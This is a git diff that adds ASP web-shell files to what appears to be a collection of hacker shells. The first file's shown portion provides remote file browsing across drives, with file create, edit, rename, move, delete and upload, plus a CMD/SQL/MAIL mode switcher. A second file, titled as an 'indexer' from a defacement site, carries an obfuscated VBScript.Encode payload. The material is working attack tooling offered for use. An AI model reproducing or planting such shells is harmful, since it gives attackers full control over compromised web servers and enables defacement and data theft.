+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/xakep-shells/ASP/indexer.asp.txt b/xakep-shells/ASP/indexer.asp.txt
new file mode 100644
index 0000000..9f1e13b
--- /dev/null
+++ b/xakep-shells/ASP/indexer.asp.txt
@@ -0,0 +1,74 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
+<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+	YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Výx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;þY!Dhl,CCV0ýP..k^:kþ,#nXmP`x;Y;ssEþ~?.\DsCMlPÝU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMýUPbç+.rðbxk~G0Ehl0~bçkU,XmyýVsýþYýM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ð.lþsl[C	P}C4s+O/b"1+~Ý	N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr	PFE^smxýsýþý,ÝV0PAm3ýþDCPnl.ýþý3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~ÝçbxPF;^VCxsC,|ýsm\!yE	E,63!X;x!y  c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC	k:xE@!mnxDnM@*@!6W	YP1W^GD{Vr:Pdr.+'l@*|!VVmUýhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mðýxýy~r	Nn6b~Tk.bx,`bDl1Cðýxý.Prx9+a~n+x9rPUkYUry9+,rs:Csý*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPný/sCPÝ	Nn6bPuC	